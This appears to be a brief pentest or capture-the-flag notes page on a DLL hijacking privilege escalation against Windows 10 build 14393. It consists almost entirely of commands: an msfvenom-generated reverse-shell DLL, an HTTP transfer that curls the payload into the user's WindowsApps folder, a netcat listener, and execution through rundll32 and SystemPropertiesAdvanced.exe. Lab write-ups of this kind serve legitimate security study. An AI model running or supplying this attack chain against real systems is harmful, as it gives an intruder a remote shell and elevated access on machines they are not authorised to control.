windows-10-14393-exploit
Reviewing path variable
cmd /c echo %PATH%Generating Malicious DLL library
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=8443 -f dll > srrstr.dllTransfer the library
python3 -m http.servercurl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"Start listener
nc -lvnp 8443Run the DLL library
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dllExecuting SystemPropertiesAdvanced.exe on Target host
Last updated